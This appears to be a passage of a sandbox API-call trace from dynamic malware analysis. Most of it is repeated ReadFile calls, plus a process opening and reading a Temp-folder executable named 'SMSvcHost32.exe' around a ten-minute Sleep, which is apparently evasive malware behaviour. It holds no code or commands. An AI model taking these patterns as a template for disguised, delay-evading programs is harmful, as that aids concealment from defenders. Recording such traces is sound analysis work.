	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.090] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x35
	[0088.090] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpDst=0x658308, nSize=0x35 | out: lpDst="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 0x35
	[0088.090] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x234
	[0088.090] GetFileSize (in: hFile=0x234, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3d600
	[0088.092] ReadFile (in: hFile=0x234, lpBuffer=0x660120, nNumberOfBytesToRead=0x3d600, lpNumberOfBytesRead=0x205fd1c, lpOverlapped=0x0 | out: lpBuffer=0x660120*, lpNumberOfBytesRead=0x205fd1c*=0x3d600, lpOverlapped=0x0) returned 1
	[0088.093] CloseHandle (hObject=0x234) returned 1
	[0088.093] Sleep (dwMilliseconds=0x927c0) 
	[0098.161] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248
	[0098.161] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.162] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.162] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.162] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.162] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.162] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.163] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.163] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.163] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.163] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.163] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.164] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.165] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
